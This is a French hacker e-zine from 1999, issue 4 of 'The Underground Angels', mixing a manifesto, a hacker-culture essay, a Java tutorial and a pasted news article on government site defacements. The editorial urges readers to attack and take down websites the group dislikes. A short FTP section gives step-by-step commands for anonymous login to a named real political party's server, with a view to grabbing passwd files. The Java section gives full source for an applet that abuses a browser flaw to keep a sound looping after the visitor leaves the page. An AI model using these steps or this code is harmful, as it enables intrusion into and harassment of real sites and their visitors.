              ____________ _     _  _  _ _       __________ _
             /           / /    / // / / /      /  ___    / /
            /___________/_/    / // / / /      /  /   /  / /
               /    / /       / // / / /      /  /___/  / /
              /    / /  ___  / // / / / __   /  ____   / /  ___
             /    / /  /  / /  \_/ / / /  / /  / / /  / /  /  /
            /____/_/  /__/  \_____/_/ /__/ /__/_/ /__/_/  /__/


                         THE UNDERGROUND ANGELS
                               -------
                      HTTP://undergroundangel.cjb.net
                      HTTP://WWW.multimania.com/TUA/
              #TUA et #Hack.fr sur irc.kewl.org 6667 (Le Samedi soir)
                         white_angel_tua@hotmail

                             _______________
                            |  E-Zine N4   |
                            |Par White Angel|                     
                            |_______________|
                             SEPTEMBRE 1999

A LIRE DANS WORDPAD !
======================================================================                           
                                EDITORIAL
======================================================================

Et c'est repartis...Pour un 4me numro de The Underground Angels
Aprs de belles vacances comme a, nous revoil en pleine forme
pour vous apprendre de nouvelles techniques....

Toujours plus de monde sur notre site, toujours plus de membres et 
toujours plus de lecteurs...
Mais avant tout pour les nouveaux, une prsentation du groupe.
Qui sommes nous ??

TUA est une organisation underground rassemblant des personnes franco-
phones de tout pays (France, Belgique, Canada...etc).
Nous sommes principalement des hackers(dbutants ou confirms) qui
veulent remettre un peu d'ordre sur Internet en supprimant les sites
suivants:

-Sites pdophiles
-Sites Racistes
-Sites Nazis (SS, FN....)
-Sites de pays ou les droits de l'homme ne sont pas respects.
-Sites prnant l'esclavagisme (Hommes, Femmes, Enfants...)
-Sites de socits utilisant des animaux pour des expriences ou pour 
des fourrures.
-Des grosses entreprises dangereuses (Microsoft, France Tlcom)
-Sites de sectes (Eglise de la Scientologie...)
-Autres sites empcheur de tourner en rond....

Pour nous, internet est quelque chose de prcieux qu'il faut protger.
Nous devons alors attaquer et frapper l ou ca fait mal et surtout l
o les autorits ne peuvent pas agir.
Mais aussi, pour nous, le hack est une philosophie de vivre, un art 
et surtout un moyen de faire passer nos ides...

Le Hacking, c'est aussi une philosophie qui consiste  rgler des 
problmes et  relever des dfis que la plupart des gens contourneraient 
ou ne verraient mme pas. Utiliser des moyens dtourns pour accder
 des choses que personne ne connait.
Ce n'est pas le rsultat qui compte mais la mthode employe...

Voil. en ce qui nous concerne, nous ne faisons pas a pour l'argent
ni pour la gloire...Mais plutt pour nous faire connaitre et prouver
au monde entier que le hacking n'est pas un dlit mais plutt un
nouveau moyen d'expression qui fait trs peur  tous les gouvernements...
Et aussi pour empcher certains sites et organisations de venir polluer
notre rseau, Internet, que je considre comme mon rseau, ton rseau,
les autres (Mr Tout_le_monde) ne sont que "tolrs" par nous tant 
qu'ils ne nous nuisent pas et ne nuisent pas au rseau....


White Angel

Sinon, un conseil, apprenez, apprenez et aprs, rejoignez nous !!!

[Nd MadDany : et apprenez encore un peu aprs a ! :o)]

========================================================================
                                  SOMMAIRE
========================================================================
au sommaire cette fois ci:

-Devenir et Reconnaitre un Hacker (White Angel)
-Exploits FTP (Korben)
-Initiation  la programmation Java (MadDany)
-Bonus
-Liste des ports (MadDany)
-Hack de serveur Web avec votre Browser (White Angel)
-Test (MadDany)
-Rester anonyme sur le Web (White Angel)
-WinGates (MadDany)
-Xoom.com (Korben)
-Rejoignez nous !!
-Remerciements !!

========================================================================
                DEVENIR UN HACKER/RECONNAITRE UN HACKER...etc
========================================================================
Texte qui rsume bien la faon de penser du hacker et qui permet de faire
un tour trs rapide de notre communaut Underground...
copier/coller du zine 2020hack par Clad Strife (la flemme me perdra...)
(G vir le passage sur Back Orifice...)
[Nd MadDany : et moi j'ai corrig les ftes d'ortograf]
[Nd WA : Merci gars car ceux de 20/20hack ils sont 0/20 en orthographe]
__________________________________________________________________________
Le hacking est un phnomne qui touche de plus en plus de gens partout dans 
le monde! De plus en plus de gens sont intresss par cette mentalit qu'est 
celle du hacking... Nombre de personnes rveraient de devenir hacker. 
Et nombre de personnes se font une mauvaise image du hacker en gnral. 

Car en effet il faut diffrencier les types de pirates: Il y a: 

 Les crashers: les crashers sont de dangeraux pirates qui dtruisent tout 
pour le plaisir... cette mentalit est peut-tre l'une des moins rpandues, 
car il faut savoir que les crashers sont trs souvent has par le milieu du 
piratage. A viter donc. 
 Les crackers: ils sont l pour cracker les programmes (ex: enlever le 
passworrd d'un file en le dsassemblant pour le diffuser ensuite sur internet). 
Les crackers ne sont pas fondamentalement dangereux. les trs bons crackers
sont de vritables gnies (il faut le dire) de la programmation. sans eux 
le rseau internet ne serait pas ce qu'il est maintenant. 
 Les lamers: en gnral ce sont les dbutants dans le milieu du piratage... 
Ce sont souvent les "bizus" des lites! Si vous dbutez dans le milieu 
du H/P/C/V (hacking, cracking, phreaking etc...)essayez d'acqurir 
un certain niveau de connaissance seul... en gnral les lites du 
dessus n'hsiteront pas  vous filer un ou deux trojans entre quelques
programmes. sauf si c'est quelqu'un que vous connaissez bien ou qui est 
votre ami. 
 Les phreakers: le phreaker est un pirate du rseau tlphonique en gnral...
Mais il peut aussi pirater sa borne EDF, graver des cd cracks etc... 
En gnral les phreakers se mlent rarement au milieu du hacking. Tout ce 
qui concerne le piratage de la ligne tlphonique du voisin pour se faire des 
minutes gratos a les concerne! 
 Les hackers: ce sont les pirates du net... Les meilleurs du hacking sont 
quasiment inconnus. Jusqu'au jour ou ils pratent le Pentagone et qu'ils se 
font choper! La moyenne d'ge des hackers tourne entre 15 et 25 ans. Ils 
piratent n'importe quoi. Par simple dfi. Par pur plaisir. Les hackers 
s'attaquent rarement aux autres internautes! Mais mfiez vous! Les hackers 
sont un peu crashers dans leur ct obscur. Donc c'est surtout des hackers 
dont nous parlerons. Il faut savoir que les mdias donnent une mauvaise image 
du hacking, en faisant des articles diffamateurs ou en mdiatisant le 
mauvais ct du hacking. Les mdias profitent de l'ignorance que les 
gens ont sur le piratage pour dtruire la VERITABLE image du hacker! 
Sans les hackers allez savoir si votre rseau internet existerait! Internet 
tait au dpart un rseau militaire. Mais les universitaires et les scientifiques 
en ont fait le rseau internet. Et pas les mdias (qui font jamais bien leur 
boulot d'ailleurs :-))! 
Des universitaires! Donc tout a pour vous dire que ce que les mdias pourront 
vous raconter sur le piratage informatique ne sera pas toujours juste. Mais
si on a tendance  penser qu'un hacker est un dangereux criminel,
celui-ci aura tendance  se criminaliser; c'est psychologique. Mais les 
hackers sont loin d'tres tous dangereux... 

[Nd MadDany : nous sommes loin d'tre ***tous*** dangereux... harf harf harf]

Certains hackent mme pour prouver qu'aucun systme de scurit ou sytmes 
d'exploitation n'est infaillible. 
Ce qui nous permet de dmontrer que Windows est une vraie "passoire" 
(pardonnez l'expression). 
Ainsi on pourrait s'imaginer que certains trous de scurit sont volontaires.
D'ailleurs Microsoft a fait en sorte 
que Money99 (qui n'est pas encore officiellement sorti) ne marche que si
Microsoft Intenet Explorer 4 est install!
Les accusations qui se font au sujet de Bill Gates, comme quoi son but serait 
de dtenir tout le march de l'informatique, peuvent tre considres comme 
vraies! Pas  100%. Mais il faut avouer que Microsoft est ce qu'est Coca-Cola 
par rapport  la grenadine. Les statistiques dmontrent que Microsoft dtient 
environ + de 90% du march informatique, mais... pouvons nous incriminer Bill Gates? 
car si vous tes pas content y'a toujours Linux ou Unix! Et vous devez aussi 
avoir Netscape Navigator sur votre bcane, non? Bref pour clore cette introduction
je tiens quand mme  vous dire que, bien que les mdias arrangent les faits 
leur manire, 
ceux-ci ne sont jamais forcment errons. 

                  ----- 2/ Un hacker... c'est quoi au juste? -----

Ben... comment vous expliquer a. Un hacker (je vais faire quand mme un petit 
rcapitulatif de ce qui a t vu plus haut), c'est un pirate qui essaie de dcouvrir les failles de chaque systme, c'est quelqu'un qui cre des programmes de piratage etc..., 
par simple dfi. Pas pour le fric (pas toujours: la tune tombe pas des arbres). 
Bref... Les hackers forment aussi une "communaut" ou l'on se doit d'tre solidaire...
Les hackers se tapent rarement dessus. [Nd MadDany : il y en a qui devraient lire ce passage une centaine de fois avant de se coucher, tous les soirs pendant deux ans...] Mais le hacking c'est aussi une mentalit. 
Une volont. On ne se lance pas dans le hacking pour dconner. Non... 
En gnral on va jusqu'au bout. Rares sont ceux qui ont abandonn en cours de route. 
Il y a tellement de choses  dcouvrir dans le monde du piratage que cela revient  en dcouvrir un nouveau monde: l'autre ct de l'utilisation d'un ordinateur. 
Pas forcment le ct obscur de l'utilisation d'un ordinateur mais surtout les 
possibilits que ce ct peut nous offrir (si vous voyez ce que je veux dire!). 
Il faut savoir qu'il y a diffrents aspects dans le hacking! On peut facilement
se les imaginer: tudes des diffrents systmes de scurit, cration de programmes,
piratage du pc d'un pauvre internaute etc... en gnral les trs bons 
hackers sont appels: Elites et sont quasiment inconnus! Si jamais vous en rencontrez un ou que 
vous avez judicieusement su en reconnaitre un, eh ben gardez a pour vous. 
Rien de pire que de s'attirer des emmerdes, de toute la communaut hacker,
qu'en dnoncant " un de l'lite". Mais un hacker c'est aussi une personne
comme vous et moi! On ne doit pas s'imaginer que parce qu'une personne pirate elle se diffrencie forcment de la socit dans laquelle vous vivez. Elle est contribuable,
regarde la tl (Eh oui! Ca lui arrive!), dort dans un lit, etc... mais un hacker 
c'est aussi une personne aimable, courtoise et pas forcment belliqueuse! 
Loin de toutes les ides reues ce serait plutt le contraire: 
tendance pacifique. Mais bon... Y'a des exceptions hein! Faudrait pas s'faire
des illusions! (on va finir par croire 
que je contredis ce que j'cris!) 

             ----- 3/ Savoir reconnaitre un hacker et devenir hacker -----

Bon... Il faut savoir que ce sera pour vous un honneur si vous rencontrez dans 
votre vie une personne de l'lite(c.f. para 2/). Donc il sont trs trs difficilement reconnaissable, de plus c'est pas lui qui vous le dira! Comptez pas l-dessus! 
Il vous faudra vous contenter de reconnaitre les hackers (je dirais pas les 
moyens), mais ceux qui ont dpass ce stade de dbutant. Ceux qui savent des
trucs, ceux qui peuvent vous apprendre des trucs mais pas des dbutants 
(bien qu'il ne sache pas tout). Donc je vais vous expliquer comment reconnaitre 
un hacker... Mais d'abord un petit point que je voudrais claircir... J'avais 
lu un e-mag qui disait: "pour tre un hacker il faut mettre des 3  la place 
des E, des 5  la place des S, des 0  la place des 0, de mettre des Z  la fin 
de chaque mot au pluriel etc..." ce qui pouvait donnait des phrases totalement 
absurdes. Cet E-mag disait aussi qu'un hacker est fier d'avoir une orthographe 
compltement nulle et il le montre. Inutile de vous dire que ces informations m'ont 
donn envie de vomir. rien de pire que de prendre les gens pour des cons. 

[Nd MadDany : t'es gentil Clad mais t'aurais du lire ton texte jusqu'au bout, c'tait une satyre, une parodie. Pour rigoler quoi. Dans l'esprit du TrOu dU cul'Z hiD3oUt.]
[Nd WA: D'ailleurs, l'lite  un language soutenu dans le genre 'upper class']

Si une personne arrive sur le chat avec une orthographe pas possible et une criture de dment, 
inutile de vous poser trop de questions: 
CETTE PERSONNE N'EST PAS HACKER ET ELLE LE MONTRE. Rien de moins srieux qu'une 
personne faisant exprs d'avoir une orthographe xecrable et une criture pas 
possible. 
Car un hacker (en gnral) est quelqu'un de srieux et essaie d'avoir au 
maximum la meilleure orthographe et criture possible! [Nd MadDany : ;^)] Mais on peut aussi se 
dire que l'habit ne fait pas le moine. Que les hackers n'ont pas forcment une bonne orthographe. c'est vrai! Il ne faut pas prjuger! mais sachez faire la diffrence.
Mais inutile de vous dire que si un mec arrive sur un chat en gueulant  qui 
veut l'entendre: "Je suis hacker! Je suis le meilleur des pirates" et autres 
insanits, cette personne n'a mme pas du se poser la question une fois dans sa 
vie, ce qu'tait un hacker... encore un blaireau... Inutile de demander son chemin
 cette espce l! Il y a aussi le mec qui rpond n'importe quoi ou qui se ramne
avec des nicks trop vidents (ex: hack-man), qui lui doit en savoir un peu plus 
que l'autre blaireau mais bon... Un peu trop orgueuilleux! Parce que je vais vous 
raconter une anecdote: j'connais un mec qui s'est ramen sur le chat en beuglant: 
"Je suis un pirate! Je suis un hacker!". Obligatoirement je lui ai demand de me 
le prouver. 
Je n'attendais aucune rponse bien srieuse de sa part. D'ailleurs je n'en ai 
pas eu. Ce mec j'ai russi  trouver son UIN, son IP et tout le bla-bla... alors au
dbut je lui ai parl piratage (sur icq), histoire de voir s'il en connaissait un bout... 
J'lui ai envoy des files pour qu'il puisse se dmerder (parce que je me suis 
tout de mme aperu qu'il ne savait rien! MAIS RIEN DU TOUT! Mais bon... comme il tait intress...), et aprs il m'a dit (je vais
reproduire le dialogue): 
<M(je garde le nom secret, par respect)> comment on fait pour lire ton file??? 
<Clad Strife> ben... tu le dzipes et tu lis le txt! 
<M> c'est quoi un txt? 
<Clad Strife> Tu sais mme pas a? ohll! c'est un document texte! 
<M> Ahh! Et pour le dzipper? Coment k'on fait? 
<Clad Strife> tu cliques 2 fois rapidement sur le logo! 
<M> Ah! *user is away* 
<Clad Strife> Ca marche? 
<M> *user is away* 
<Clad Strife> hoh!!! (l je fais ctrl+G ( a fait du bruit chez l'autre)! On 
aurait dit que le mec se serait endormi sur son clavier; le *user is away* 
signifiant qu'il est plus sur le chat) 
<M> Ouais et ben ca marche po! (le con savait pas dzipper) 
<Clad Strife> Putain! t'es naze comme mec! 
<M> ohoh! calme toi! Je te signale que j'ai des trucs qui font mal trs mal!!! 
(il venait de tlcharger un nuker et Nonuker! Alors il essaie de me nuker! 
Le fire-wall dtecte! Je chope son IP! Je bloque l'attaque, puis je sors un autre 
nuker, je le nuke sur un autre port que le 139, mais son anti-nuker dtecte. AE!) 
<Clad Strife> t'es vraiment nul! Connard! t'as un nuker et tu te crois le 
boss des hackers! l'lite! tu me fais piti! pff! 
<M> Tais-toi sinon je te fais trs mal! J'ai des trucs qui bousillent! 
(bien sur il a que dalle!) <Clad Strife> C'est vrai? Oh non! Piti! 
Pas a! hahahahahahahahaha! Ben vas-y essaie! 
J'ai envie de rire! Tu me fais hurler de rire t'es un bouffon! 
<M> Tais-toi sinon j'appele mon copain! c'est lui qui m'a fil les programes!!!* 
<Clad Strife> Encore un blaireau... 
<M> oh et puis merde j'me casse! t'es trop con! Enfoir 
*User has left the chat* 
Bon eh ben lui il m'a grave fait chier! Sauf que j'appris par la suite que
son copain c'tait J (secret aussi), un de mes potes qui entre deux nukers 
lui avait fil un trojan! Alors... ce mec si vous le rencontrez et que 
vous reconnaissez sa manire de faire, n'hsitez pas  lui "foutre un pain
sur la gueule"! J'avais manqu de tact ce jour l mais bon... De plus 
j'avais son tel. Il a pass un sale quart d'heure! Il a plus recommenc. 
Mais si je vous raconte cette anecdote c'est pas pour rien. C'est pour 
vous dmontrer que des gros cons 
(pardonnez l'injure mais a dfoule) orgueuilleux y'en a 
partout! Revenons  nos moutons... J'ai souvent vu marqu qu'un vrai 
hacker se devait d'avoir Linux (dans d'autres E-mags Unix), s'il voulait 
devenir un VRAI hacker... 
Mais pour en revenir  notre premier E-mag (c.f. dbut chapitre), 
celui-ci disait: "vous devez avoir Linux sinon c'est inutile d'essayer 
d'tre hacker. L j'ai vomi :-). Comment peut-on dire des choses aussi 
absurdes! On peut trs bien tre hacker et ne pas tre sous Linux ou Unix!
Pourquoi pas sous Windows95 ou Windows98! Moi je suis sous Windows95 et j'en
suis fier! Bien que Linux n'est absolement pas ngligeable pour hacker! [Nd MadDany : Linux sucks !!!] Mais 
de l  dire que c'est l'outil qu'on se DOIT d'avoir, l non!!! Rien de plus 
faux! je le dis, je le rpte! Et je continuerais de le rpter! J'avais aussi 
remarqu que les hackers (les bons et les dbutants), mettaient souvent des 
petits signes distinctifs, dans certains mots, tel que: Micro$oft ou transformait 
des mots pour en faire des: zindaube, winfuke, microdobe, 
etc... Nous sommes loin des critres dbiles du E en 3 et du O en 0! Non... 
L a a surtout un caractre humoristique qui tient  dmontrer que l'on se moque bien de windows et de ses trous de scurit! donc pour se dmarquer de tous ces dbiles 
qui prenne a  la lgre! Je vais aborder un autre type de personnes qui 
existent: les lamers (c.f.: chapitre1). Les lamers sont loin d'tre des gros cons... Au contraire. 
ce sont en gnral des personnes qui dbutent dans le milieu! Il n'est 
pas exclu de les aider! Il sauront vous le rendre tt ou tard! Les lamers 
disent qu'ils aimeraient tre hacker et demanderont au premier venu de leur 
enseigner pour peu que celui-ci s'y connaisse un peu. c'est pourquoi, vous 
recevrez souvent des messages de lamers qui vous demanderont de leur apprendre 
le hacking. Evitez de les envoyer balader! Ils vous ont rien fait ;-). 
Vous aussi vous avez t lamers au tout dbut de votre priode! Vous aussi vous 
avez demand  des gens de vous apprendre! Alors??? Bref... Essayez de vous 
dmarquer des blaireaux sans pour autant ne pas vous amuser  glisser un petit 
Zindaube dans la conversation :-)!!! (Non. en fait je dis a car j'aimais pas trop 
qu'on m'envoie promener au dbut de mon apprentissage!) 

__________________________________________________________________________

Voil, cela rsume bien le hacking en gnral...Ca, c'est pour les Newbies.
Un petit repre....

WA
========================================================================
                                  EXPLOIT FTP
========================================================================
Assez vieux mais bon, c juste pour le fun...
A essayer sur certains serveurs....

lancer command.com
taper:
>ftp -n

le prog se lance, vs avez alors:
ftp>
L, vous tapez la commande open suivie du nom du site ou de son IP
ftp>open www.front-nat.fr
Un message dfilera...Bienvenue...etc

une fois connect, tapez:
ftp>QUOTE user ftp
User name accepted, enter a password

ftp>Quote cwd ~root
Please login with user and pass before

ftp>QUOTE pass ftp
et voil, normalement, vs tes connect  la machine...
tapez ? pour avoir la liste des commandes...

[Nd MadDany : en faisant a on se logge en tant que guest, avec toutes les restrictions d'usage. C'est bien pour choper les fichiers passwd par exemple mais n'oubliez pas que vous tes tout de mme logg, toutes les commandes que vous tapez, votre IP et votre hte, tout a est enregistr. Alors imaginez pas que vous tes root rien qu'en tapant a. De plus si vous faites juste get etc/passwd et que vous vous dconnectez en suivant c'est pas trs discret vos intentions.]
                         
Korben
========================================================================
           The ultimate guide to eating rotten worms, by MadDany
========================================================================
               
Bienvenue dans ma collection des titres-qui-n'ont-rien--voir-avec-le-reste-de-l'article. 
Donc, comme son titre ne l'indique pas, cet article est une introduction au Java. 

Le Java est un langage de programmation, qui est encore peu connu. Il a t cr pour apporter avec les mmes objectifs de l'HTML, mais pour faire cette fois un vrai langage de programmation. Pour les incultes, l'HTML a t dvelopp pour que des documents puissent tre visibles sur toute la plante, et fonctionnent de la mme manire. Pari russi, vous pouvez tous visualisez des pages web, que vous soyez sous Zin, Mac, Linux... Donc le Java est un langage de programmation qui est portable, c'est  dire qui permet de crer des programmes fonctionnant indifremment de l'environnement de travail. Pour cela, la solution tait simple, au lieu de faire des programmes excutables "classiques", on va faire des programmes s'utilisant depuis une interface, et c'est cette interface qui va changer d'un OS  l'autre. Donc vous pouvez crire vos programmes en Java en sachant que sans aucune modification il pourra tourner sur l'ordi de votre pote qui a un Mac (bouuuhhh les macs !!!). 

Maintenant entrons dans les spcifications de Java : il existe deux types de programmes : les applets et les applications. Les applets sont spcialement conus pour tre intgrs  des pages web, et pouvoir ainsi amliorer le niveau technique de ces dernires, l'interactivit, la scurit, ou l'ergonomie... les applications sont de vrais programmes, ils s'utilisent non plus depuis votre browser mais depuis une interface Java spcifique. Comme vous n'en possdez srement pas, vous pouvez tlcharger le JRE  cette adresse : http://www.java.sun.com/products/

Le JRE (Java Runtime Environment) vous permettra d'utiliser les applications Java (qui sont en .class), mais aussi les applets grce  l'appletviewer. L'avantage de visualiser les applets  partir de cet outil c'est que l'appletviewer est bien plus performant que la console Java de votre browser, et qu'en plus il est compatible avec les fonctionnalits de Java 2, alors que les consoles Java des browsers en sont toujours  Java 1.0.2 ou 1.1 pour la plupart.

Les applications et les applets Java sont des fichiers portant l'extensions .class, comme ils ne sont pas excutables vous ne pourrez rien faire en cliquant dessus. Pour les utiliser placez les dans le rpertoire bin du JRE, en principe celui o vous trouverez le programme java.exe. Pour les visualiser, placez vous dans ce rpertoire en passant par le DOS (je sais pas comment on fait pour les autres OS), puis tapez java nomdufichier, en supposant que votre programme s'appelle nomdufichier.class. Si ce programme est un applet, tapez appletviewer programme. Vous connaissez les principes de base de Java, et comment utiliser des programmes crits avec ce langage fabuleux !


Maintenant il se peut que vous tombiez sur des fichiers sources de programmes crits en Java, je vais donc rapidement dcoder certains lments.

Voici un fichier source d'applet que j'ai ralis, mes commentaires sont soit entre /* et */, soit aprs // : 

-------------------BEGIN SOURCE CODE--------------------
/* cet applet a t cr par MadDany. Lorsqu'il est excut depuis un browser, il joue un petit son nervant, et il continue de le jouer mme si on quitte la page contenant l'applet (tant donn que c'est la console java du browser qui se charge de jouer le son, ce genre d'vnements est alors indpendant de la page en cours). Les seuls moyens d'arrter ce son sont : 1)fermer le browser ou 2)couper le son. Cet applet marchera sur n'importe quel browser compatible Java 1.0.2 ou 1.1, comme Netscape 4.0 ou Internet Explorer 4.0 (ou plus). Il est possible de changer le texte qui va apparaitre dans la fentre d'applet en insrant un tag <param name="texte" value="blablabla"> entre les tags <applet> </applet>, o blablabla est le texte que vous voulez voir apparaitre. 

Si quelqu'un prend la peine d'amliorer cet applet, qu'il m'en envoie une copie  maddany@multimania.com. Merci
If anybody upgrades this applet, please send me a copy at maddany@multimania.com. Thx

MadDany 1999 */


/* importation des classes ncessaires  l'excution du programme ces classes sont des programmes dj crits, dont je vais importer les caractristiques dans cet applet. J'explique ce principe plus loin. */
import java.awt.Graphics;
import java.applet.AudioClip;
import java.awt.Color;
import java.awt.Font;

public class AudioTrap extends java.applet.Applet implements Runnable {

// dclaration des variables
    AudioClip beep;
    Thread runner;
    Font police1 = new Font("Impact", Font.BOLD, 100);
    String texte;

// dbut du Thread jouant le son
    public void start() {
        if (runner == null) {
        runner = new Thread(this);
        runner.start(); 
        }
    }

// arrt du Thread, sans pour autant arrter le son !!!
    public void stop() {
        if (runner != null) {
            runner = null; 
        }
    }
        
// chargement des diffrents paramtres, comme le son et le texte  partir de la page web
    public void init() {
        texte = getParameter("texte");
        if (texte == null)
            texte = "LaMaH FuCk !!!";
        beep = getAudioClip(getCodeBase(), "beep.au"); 
    }    

// le son est jou en boucle
    public void run() {
        if (beep != null) 
        beep.loop();
        Thread thisThread = Thread.currentThread();
   }    
            
// dfinition des paramtres graphiques
    public void paint(Graphics screen) {
        setBackground(Color.black);
        screen.setFont(police1);
        screen.setColor(Color.red);
        screen.drawString(texte, 0, 300);
    }
}
-------------------END SOURCE CODE--------------------

Avec les commentaires c'est pas bien sorcier non ? Je vais dcortiquer plus prcisment. Java est un langage orient objet, c'est  dire que vous allez dfinir une classe (les classes sont comme des minis programmes, mais dont certains ne font rien, les classes peuvent trs bien seulement dfinir un comportement) avec un comportement assez abstrait, regroupant surtout des variables et des mthodes gnrales. Puis vous allez crer des sous classes de cette classe qui vont hriter de son comportement, ses variables, ses mthodes... et ainsi de suite,  chaque fois que vous crez une sous classe, vous affinez un peu plus le fonctionnement, jusqu'au moment ou vous crez des instances de ces sous classes, comme des bbs. Ces bbs vont hriter du fonctionnement de leurs parents, les classes sont l pour dire aux instances (ou objets) comment se comporter. Voici le principe de la programmation oriente objet. Donc au tout dbut du programme, avec la commande "import", je vais faire appel  des packages de classes qui vont apprendre  mon programme  faire des choses en lui faisant hriter de leur fonctionnement. En l'occurence je vais pouvoir dessiner des choses, jouer des sons, utiliser des couleurs et des polices d'criture spciales.

Ensuite je dfinis la classe, ce qui va permettre  mon applet d'tre utilise correctement. Je mets dedans le fragment "extends java.applet.Applet" pour dire que ce programme est un applet, et donc qu'il en reprend toutes les caractristiques. En faisant cela, je cre une sous classe de la classe Applet. Je mets aussi "implements Runnable", qui ressembvle beaucoup au fragment prcdent. La formulation est diffrente parce que je reprend le comportement d'une interface, en l'occurence Runnable. Il existe beaucoup de similarits entre ces deux oprations, aprs cela devient trs technique.

Ensuite je dclare mes variables. Comme leur nom l'indique, les variables sont un type d'objet (que je vais pouvoir utiliser dans tout le programme car je les ai dclares au dbut) dont la valeur poura changer selon mes besoins. Les variables peuvent tre de type numrique (un entier, un chiffre  virgule flottante...), du texte que l'on fera varier, et bien d'autres... le fonctionnement d'un dclarement de variable est simple, il suffit de mettre le type de variable puis le nom de la variable que j'ai choisi.Par exemple : "String texte" cre une variable de type chane (du texte) que j'ai appel texte. A tout moment je pourrais affecter une valeur  cette variable en mettant simplement "texte = "ceci est un magnifique texte"". 

Vous remarquez qu' la fin de chaque ligne se trouve un ";", c'est pour indiquer plus clairement ce que l'on fait au compilateur. Certaines lignes ne comportent pas de ";" mais des accolades. Le texte se trouvant entre ces accolades est appel bloc. Dans ma dclaration de classe (public class AudioTrap...), j'ai mis une "{" pour indiquer le dbut des instructions du programme, la dernire ligne sera une accolade fermante "}" qui va indiquer la fin de cet tat. Et ainsi de suite pour chaque portion du programme.

Ensuite je dis au Thread de commencer son travail. Les Threads sont utiliss dans des applets pour dire au programme ce qu'il doit faire quand il a plusieurs actions  effectuer, il permet de respecter une marche pr-dfinie. En l'occurence j'aurais pu me passer de Thread vu que l'applet ne fait que jouer un son. Vous remarquez une ligne ressemblant  la dclaration de classe : "public void start() {...}". Ceci est une dclaration de mthode, c'est  dire une portion de programme qui fait ce qu'on lui demande quand la mthode est appele. Ici je redfinis la mthode start() contenue dans la classe Applet, pour dire  mon applet ce qu'elle doit faire lorsqu'elle commence. Toutes les autres mthodes doivent tre normalement redfinies dans un applet pour en spcifier le comportement, comme stop(), init() ou paint(). paint() n'est pas obligatoire, c'est uniquement lorsqu'on veut dessiner quelque chose dans la fentre d'applet (en l'occurence on veut dessiner du texte). La mthode run() est diffrente, elle ne nous vient pas de la classe Applet mais de l'interface Runnable qui rgit les Threads.

Ensuite dans chaque redfinition de mthode j'utilise le plus souvent des conditionnels. Ces conditionnels sont faciles  reconnatre, ils sont sous la forme :

if (condition  remplir)
    ce qu'on fait si la condition est remplie;
else
    ce qu'on fait si la condition n'est pas remplie;

Souvent on n'a pas besoin d'utiliser le mot-cl "else" car les conditions se remplissent d'elles mme ou alors on a pas besoin de dfinir un comportement si la condition n'est pas remplie, puisque souvent il s'agit de ne rien faire. Par exemple examinons le conditionnel suivant : 

if (beep != null)
    beep.loop();

Ceci signifie que si notre variable beep (le son qui doit tre jou) n'est pas paramtre sur null, le son va tre jou en boucle. En clair le son va tre automatiquement jou en boucle puisqu' aucun moment on ne le paramtre sur null. En principe on devrait mettre "beep = null;" dans la mthode stop(), qui est charge de stopper le Thread une ligne qui paramtre beep sur null, et ainsi l'applet se termine normalement lorsque vous quittez la page web. Voici la mthode telle qu'elle devrait apparatre :

    public void stop() {
        if (runner != null) {
            runner = null; 
            beep = null;
        }
    }

La mthode stop() est appele par dfinition lorsque vous quittez la page contenant l'applet, le conditionnel dit ici que lorsque la page est quitte, si le Thread tourne encore il doit tre arrt, ainsi que le son. Dans la version de mon applet le son ne s'arrte pas, je profite ici du fait qu'il est jou non pas par le navigateur lui mme (qui gre uniquement la page en cours) mais par la console java de ce dernier, qui fait uniquement tourner les applets sans s'occuper de la page qui les contient. C'est d'un dfaut entre l'interaction de ces deux programmes que l'on profite en fait :o).

Avec tout ce que vous venez d'apprendre vous ne saurez videmment pas programmer en Java, mais vous pourrez mieux comprendre ce que font les programmes dont vous verrez les fichiers source. Et puis a pate toujours les copains ;^)

J'espre avoir t clair, et peut tre vous avoir donn envie d'apprendre vraiment la programmation Java. Il suffit de vous acheter un bouquin sur le sujet (j'ai "Le Programmeur Java 2" aux ditions Campus Press, c'est pas mal, mme si il y a des passages qu'ils rsument un peu trop). Si vous voulez pouvoir compiler vos fichiers sources, il vous faut un autre outil que le JRE, le JDK ou le SDK par exemple. Vous pouvez trouver tous ces produits sur http://www.java.sun.com/, moi j'utilise le JDK (Java Developper Kit). Pour compiler des fichiers sources en Java, il suffit de les enregistrer dans un fichier .java respectant le nom de la classe. Je m'explique, dans la dfinition de classe de mon applet j'ai mis "public class AudioTrap", sauvegardez donc ce fichier dans un nouveau fichier texte, et enregistrez le sous le nom "AudioTrap.java", AVEC LES GUILLEMETS. Ainsi votre traitement de texte ne mettra pas l'extension .txt, et vous aurez un magnifique fichier source .java prt  tre compil. Ensuite mettez ce fichier dans le rpertoire bin du JDK (si vous avez pris le JDK), celui contenant normalement le programme javac.exe, et sous DOS tapez javac nomdufichier.java. Vous obtiendrez alors un nouveau fichier nomdufichier.class prt  tre utilis.

Note : comparez ces deux expressions :
javac nomdufichier.java
java nomdufichier
Vous remarquez qu'on ne marque pas l'extension avec le programme java, a n'a l'air de rien mais j'ai mis un moment pour me rendre compte que je n'arrivais  utiliser aucun programme parce que je marquais java nomdufichier.class
Alors refaites pas mon erreur...

Si vous voulez des conseils en Java, n'hsitez pas  m'crire maddany@multimania.com .oO(si vous tes une fille avec des gros seins et que vous me trouvez gnial vous pouvez me laisser votre numro de tlphone pour des cours particuliers)

[Nd WA: Tiens l, Mad ne met pas de commentaires...haha p'tet parce que 
c'est son article..arf !]

========================================================================
                                BONUS
========================================================================
Pour ceux qui comprennent l'anglais:

---------------------------------------------------------
     Computer `crackers' set sights on .gov for chaos
by Mark Mueller 
Sunday, August 1, 1999 
It was the kind of threat for which computer hackers are famous, a declaration of war dripping with the risk-free bravado so common on the anonymous Internet. 
The warning, which appeared on a hacked Web page of the U.S. Interior Department in late May, promised unrelenting attacks against government computers to avenge an FBI roundup of hackers associated with the group Global Hell. Just weeks earlier, Global Hell had claimed responsibility for an attack on the White House's main Web page. 
``Now, it's our turn to hit them where it hurts by going after every computer on the Net with a .gov,'' the message read. ``We'll keep hitting them until they get down on their knees and beg.'' That the threat was made - risking the pique of the FBI - isn't as surprising as the follow-through. In recent months, hackers, or crackers, as bad-guy hackers are known, have indeed blazed through a wide swath of government and university computers, defacing some Web sites and shutting down others. 
Among the high-profile targets: the U.S. Senate (twice), the Army, the Navy and the Departments of Agriculture, Labor and the Interior. Computer systems also were hit at Georgetown University, the University of Colorado, the University of Michigan and Harvard University. 
The most brazen of the attacks targeted the lion's den itself: the FBI Web page, which was out of service for nearly a week as programmers beefed up security on the site. 
